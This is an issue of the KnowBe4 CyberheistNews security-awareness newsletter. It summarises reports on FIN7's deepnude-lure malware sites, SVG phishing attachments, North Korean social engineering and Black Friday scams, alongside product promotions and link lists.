CyberheistNews Vol 14 #49 | December 3rd, 2024
[Heads Up] Bad Actor Uses Deepnude AI Image Generator to Lure And Infect Users
The threat group FIN7 is using the lure of generating nude images of favorite celebrities to get victims to download their NetSupport RAT.
In any social engineering scam, there's always the need to create some sense of urgency to act in order to make the potential victim take an action that enables the attack. In the case of a new attack by threat group FIN7, the urgency appears to be the desire to see deepfake nude images.
According to cybersecurity vendor SilentPush's analysis of Russia-connected FIN7's activities, the threat group hosted seven honeypot websites using domain names that included the phrase "ai-nude" in them.
The victim is prompted to upload an image and is then told their generated image is ready for download – with the download being a .zip file carrying a malicious payload.
SilentPush warns organizations to be wary of this attack and others like it, as they note that the malware being installed may compromise corporate credentials via infostealer functionality.
Organizations that enroll their employees in new-school security awareness training are better prepared for these kinds of malvertising-based cyberattacks. Sure, the deepfake nudes lure is a real outlier here, but training does educate the employee on why it's not advisable to visit and download files from unknown websites.
Blog post with links:
https://blog.knowbe4.com/threat-group-use-ai-adult-based-deepnude-image-generator-to-infect-victims
[New!] Check Out These Powerful New KnowBe4 AI Features
Join us TOMORROW, Wednesday, December 4, @ 2:00 PM (ET), for a live demo of how KnowBe4 introduces Human Risk Management with AI Defense Agents providing unparalleled, personalized security awareness training to your workforce. It quickens the learning process and reduces your organization's risk score:
- NEW! AIDA - Artificial Intelligence Driven Agents - How do they work?
- NEW! The SmartRisk Agent Version 2.0 - What was improved?
- Executive Reporting See for yourself the extreme power of the custom features!
Find out how nearly 70,000 organizations have mobilized their end users as their human firewall.
Date/Time: TOMORROW, Wednesday, December 4, @ 2:00 PM (ET)
Save My Spot!
https://info.knowbe4.com/en-us/kmsat-demo-3?partnerref=CHN2
Phishing Emails Use SVG Files to Avoid Detection
Phishing emails are increasingly using Scalable Vector Graphics (SVG) attachments to display malicious forms or deliver malware, BleepingComputer reports.
SVG is an image format that's stored in XML text files, allowing users to create an image through XML code by specifying shapes, colors, and text. Threat actors are using these files to craft convincing phishing forms that can bypass security filters.
"SVG attachments used in a recent campaign pretend to be official documents or requests for more information, prompting you to click the download button, which then downloads malware from a remote site," BleepingComputer says.
"Other campaigns utilize SVG attachments and embedded JavaScript to auto-redirect browsers to sites hosting phishing forms when the image is opened. The problem is that since these files are mostly just textual representations of images, they tend not to be detected by security software that often.
"From samples seen by BleepingComputer and uploaded to VirusTotal, at the most, they have one or two detections by security software."
Users should be on the lookout for SVG attachments, since they aren't commonly used by most businesses. If an SVG file displays what looks like an Excel spreadsheet with a login portal, for example, it's certainly a phishing attempt.
"Receiving an SVG attachment is not common for legitimate emails, and should immediately be treated with suspicion," BleepingComputer says. "Unless you are a developer and expect to receive these types of attachments, it is safer to delete any emails containing them."
Something to add to the filters. Blog post with links:
https://blog.knowbe4.com/phishing-emails-use-svg-files-to-avoid-detection-1
[NEW WHITEPAPER] AI vs. AI: Combating Cybercriminals with an AI-Powered Security Awareness Training Program
Cybercriminals are diving into AI to make the world more dangerous for the rest of us.
Fortunately, infosec professionals like you can do something about it. Chances are you're already applying AI across your tech stack. Why not leverage it to fortify your human firewall? When it comes to the vital human element of cybersecurity, the power of AI can be used to your advantage to engage users with relevant training and keep them informed against evolving cyber attacks.
This whitepaper discusses ways bad actors are using AI for their own devices. It also explores what a robust security awareness training (SAT) and simulated phishing program with AI at its core can bring to a comprehensive cybersecurity initiative.
You'll learn:
- How bad actors are using AI to supercharge their attacks
- What smarter human risk management powered by AI can look like
- How generative AI can augment existing strengths to improve security culture
Download Now:
https://info.knowbe4.com/wp-ai-powered-security-awareness-ksat-chn
CISA Strongly Recommends Phishing-Resistant MFA
By Roger Grimes
We are excited to see the Cybersecurity Infrastructure Security Agency (CISA) and outgoing Director Jen Easterly strongly recommend PHISHING-RESISTANT multi-factor authentication (MFA).
The majority of people, including the majority of cybersecurity practitioners, do not know that most MFA…especially the most popular types used today (e.g., one-time passwords, pushed-based, SMS-based, etc.), can be as easily phished or bypassed as the passwords they were intended to replace.
We have been a huge advocate for PHISHING-RESISTANT MFA since the beginning of the latest MFA push six years ago, and we were among the first companies to promote PHISHING-RESISTANT forms of MFA. When you first read or heard the phrase PHISHING-RESISTANT MFA for the first time, there was a good chance it was from us.
We were certainly the loudest, most consistent early advocates. Even today, we likely have the only inclusive list of PHISHING-RESISTANT MFA solutions on the Internet.
The Beginning
Our PHISHING-RESISTANT MFA journey began back on May 5, 2018, when late Chief Hacking Officer Kevin Mitnick created and published a video demonstrating how easy it was to bypass very popular MFA using simple phishing. Here is the related article published on KnowBe4's blog.
[CONTINUED] on the KnowBe4 Blog post with links:
https://blog.knowbe4.com/cisa-strongly-recommends-phishing-resistant-mfa
Can You Be Spoofed?
Are you aware that one of the first things hackers attempt is whether or not they can spoof the email address of someone in your domain?
This is how "CEO fraud" spear-phishing attacks are launched on your org. Such attacks are hard to defend against, unless your users know what to look for.
Are your email servers vulnerable to spoofing? KnowBe4 can help you find out with our free Domain Spoof Test. It's quick, easy and often a shocking discovery.
Find out now if your email server is configured correctly, many are not!
- This is a simple, non-intrusive "pass/fail" test
- We will send a spoofed email "from you to you"
- If it makes it through into your inbox, you know you have a problem
- You'll know within 48 hours!
Try to Spoof Me!
https://info.knowbe4.com/domain-spoof-test-1-chn
Let's stay safe out there.
Warm regards,
Stu Sjouwerman, SACP
Founder and CEO
KnowBe4, Inc.
PS: You really, really want to see KnowBe4's new powerful AI features available right now:
https://info.knowbe4.com/en-us/kmsat-demo-3?partnerref=CHN
PPS: OODA Loop's Top 10 Security, Technology, & Business Books of 2024:
https://oodaloop.com/analysis/decision-intelligence/top-10-security-technology-business-books-of-2024/
- René Descartes - Philosopher (1596 - 1650)
- Robert Frost - Poet (1874 - 1963)
You can read CyberheistNews online at our Blog
https://blog.knowbe4.com/cyberheistnews-vol-14-49-heads-up-bad-actor-uses-deepnude-ai-image-generator-to-lure-and-infect-users
North Korean Hackers Use Social Engineering For Cybercrime and Espionage
Researchers at Microsoft have outlined social engineering tactics used by several state-sponsored North Korean threat actors. North Korean government hackers often conduct cyberespionage in support of Pyongyang's weapons program, or they commit cybercrime in order to fund their heavily sanctioned regime.
One group Microsoft tracks as "Sapphire Sleet" impersonates investors or job recruiters in an attempt to trick victims into installing malware designed to steal cryptocurrency.
"Sapphire Sleet masquerades as a recruiter on professional platforms like LinkedIn and reaches out to potential victims," the researchers write. "The threat actor, posing as a recruiter, tells the target user that they have a job they are trying to fill and believe that the user would be a good candidate.
"To validate the skills listed on the target user's profile, the threat actor asks the user to complete a skills assessment from a website under the threat actor's control. The threat actor sends the target user a sign-in account and password.
"In signing in to the website and downloading the code associated with the skills assessment, the target user downloads malware onto their device, allowing the attackers to gain access to the system."
North Korea has also deployed thousands of IT workers tasked with gaining fraudulent employment at foreign companies, in order to collect a paycheck while attempting to steal intellectual property, source code, or trade secrets. In some cases, these workers steal sensitive data and attempt to extort a ransom from the company in exchange for keeping the data private.
Microsoft says these individuals operate out of North Korea, Russia, and China, and are assisted by willing or unwitting facilitators in other countries.
Notably, the IT workers are now using AI tools to help craft convincing online personas. "Microsoft has observed that, in addition to using AI to assist with creating images used with job applications, North Korean IT workers are experimenting with other AI technologies such as voice-changing software," the researchers write.
"This aligns with observations shared in earlier blogs showing threat actors using AI as a productivity tool to refine their attack techniques. While we do not see threat actors using combined AI voice and video products as a tactic, we do recognize that if actors were to combine these technologies, it's possible that future campaigns may involve IT workers using these programs to attempt to trick interviewers into thinking they are not communicating with a North Korean IT worker."
Microsoft has the story:
https://www.microsoft.com/en-us/security/blog/2024/11/22/microsoft-shares-latest-intelligence-on-north-korean-and-chinese-threat-actors-at-cyberwarcon/
Three in Four Black Friday Spam Emails Were Scams
Three out of four Black Friday-themed spam emails are scams, according to researchers at Bitdefender. Most of these scams are targeting users in the US and Europe.
"This year, 77% of all Black Friday-themed spam (by volume) analyzed by Bitdefender's Antispam Lab team was classified as scams, while only 22% was identified as marketing lures—emails designed to drive traffic to legitimate but overly aggressive promotions," the researchers write.
"In 2023, 7 out of every 10 Black Friday-themed spam emails were scams, compared to 2024, when this figure rose to 3 out of every 4 emails. This 7% increase in scam prevalence underscores the greed and daring of cybercriminals, who increasingly leverage fake offers and phishing tactics to exploit consumer shopping behaviors and trends."
Threat actors are tailoring their scams to specific regions, using familiar social engineering techniques to trick people into acting quickly.
"As in our previous Black Friday scam trends analysis, scammers leaned heavily on impersonating trusted brands and leveraging psychological tactics such as urgency and exclusivity," Bitdefender says. "Fraudulent emails promised exclusive or early access to Black Friday deals and rewards in exchange for survey participation or irresistible discounts on mystery boxes for submitting payment details.
"Counterfeit Rolex watches, Louis Vuitton bags, and Ray-Ban sunglasses are among the recurring themes and usual suspects in this year's Black Friday scam agenda, with scammers luring shoppers with realistic websites and too-good-to-be-true prices."
Predictably, these scams have steadily increased in the days ahead of Black Friday. Similar shopping scams should be expected to continue throughout the holiday season, however.
"Spam activity surged in the lead-up to Black Friday, with a noticeable uptick starting in late October," the researchers write. "According to data gathered between Oct. 1 and Nov. 17, 2024, Black Friday spam rates peaked at over 6% of total Black Friday Spam email volume, showing a significant increase compared to early October.
"The spikes in activity align with the shopping season's momentum as scammers leverage the heightened consumer interest in deals."
Set up a campaign to alerts your users.
What KnowBe4 Customers Say
"I can't speak enough for what a great job Max B. does as our CSM. I look forward to working with him during our regular quarterly meetings. He always comes well prepared with ideas and suggestions for new training and phishing campaigns.
He has helped me set up monthly Scam of the Week and Security Hints & Tips campaigns that almost serve as monthly newsletters for us. He is creative on how to use the KnowBe4 platform to get the most bang for our buck out of the system. He is also extremely flexible when my life goes awry, he never has a problem rescheduling and getting our meeting fit back into his schedule.
Max does an awesome job at representing KnowBe4. Thanks…"
- P.J., Manager of IT Infrastructure & Cybersecurity
- The only thing worse than being fired is scammers fooling you into thinking you're fired:
https://www.theregister.com/2024/11/28/fired_phishing_campaign_cloudflare/ - KnowBe4 Predicts AI Advances Will Shape Evolving Landscape of Cyber Threats and Defenses:
https://www.morningstar.com/news/pr-newswire/20241125fl65182/knowbe4-predicts-ai-advances-will-shape-evolving-landscape-of-cyber-threats-and-defenses - Interpol Clamps Down on Cybercrime and Arrests Over 1,000 Suspects in Africa:
https://www.interpol.int/en/News-and-Events/News/2024/Major-cybercrime-operation-nets-1-006-suspects - Google takes down fake news sites, wire services run by Chinese influence operation:
https://therecord.media/google-fake-news-china-outlets - KnowBe4 started a trend. "How to recognize employment fraud before it becomes a security issue":
https://www.helpnetsecurity.com/2024/11/26/employment-fraud-red-flags/ - AI viewed as phishing threat as well as defense, in new survey:
https://www.scworld.com/news/ai-viewed-as-phishing-threat-as-well-as-defense-in-new-survey - Google launches a regular scams and fraud advisory. Two of our evangelists quoted:
https://www.securitymagazine.com/articles/101211-google-launches-a-regular-scams-and-fraud-advisory - Russian cyberespionage campaign targets former Soviet states:
https://www.recordedfuture.com/research/russia-aligned-tag-110-targets-asia-and-europe - New credit card skimmer malware targets online checkout pages:
https://blog.sucuri.net/2024/11/credit-card-skimmer-malware-targeting-magento-checkout-pages.html - Hacktivist group launches ransomware attacks in support of Russia:
https://therecord.media/cybervolk-india-hacktivists-russia-ransomware
- Virtual Vaca #1 - Tired of the Tourist Crowds? Check Out Italy's Calabria Region:
https://youtu.be/QwB5D_iLyx0 - Virtual Vaca #2 Bolivia in 4K - Incredible Scenes & Hidden Gems:
https://youtu.be/56U-OdXF9eQ - New TRAILER: Mission Impossible – The Final Reckoning (New 2025 Movie):
https://youtu.be/NOhDyUmT9z0 - Unbelievable 😮 4K 60fps HDR Dolby Vision 4K Video ULTRA HD:
https://youtu.be/HZ8VF0EdITk - The Insane Engineering of Singapore's Changi Airport:
https://youtu.be/QfO4MMFXD-w - LockPickingLawyer: Unity's "Anti-Pick" Disc Lock… Picked:
https://youtu.be/jqKpVPvVMJ4 - "The Crackinator", A Wingsuit Flight Into A Crack:
https://youtu.be/v0XHTLXMV-Y - A never-ending stream of Bugattis leaving the Wynn Hotel for the Formula 1 Las Vegas Grand Prix race. Which one do you like the best?:
https://youtu.be/7T-8cNl9Tig - [SUPER FAVE] Totally Brilliant Dani DaOrtiz at Fool US 2022 (the one act that Penn and Teller didn't even try to figure out):
https://youtu.be/5_KcQt0z-eE - Extreme Weather & Storm Chasing Photography with Mike Mezeul II & Nikon Z8:
https://youtu.be/l6IbuFPd4N4 - Witness the jaw-dropping first descent of an uncharted, perilous peak that pushes the limits of human endurance and skill:
https://www.flixxy.com/the-ride-of-a-lifetime-conquering-the-steepest-snowboarding-peak.htm?utm_source=4 - For Da Kids #1 - Velcro Bird Won't Let Woman Have Work Calls:
https://youtu.be/jCZOi7bZLYM - For Da Kids #2 - Rescue hyena loves to snuggle:
https://youtu.be/AiE-UU-GMq0 - For Da Kids #3 - Guy Rescues Duckling Families Every Year:
https://youtu.be/kCTYda8DvjI - For Da Kids #4 - Photographer Has No Idea What This Eagle Grabbed:
https://youtu.be/SDnc6xux6L4 - For Da Kids #5 - Tiny Piglet Will Squeal Non-Stop Until He Gets His Scratches:
https://youtu.be/cTteHDQAsAA
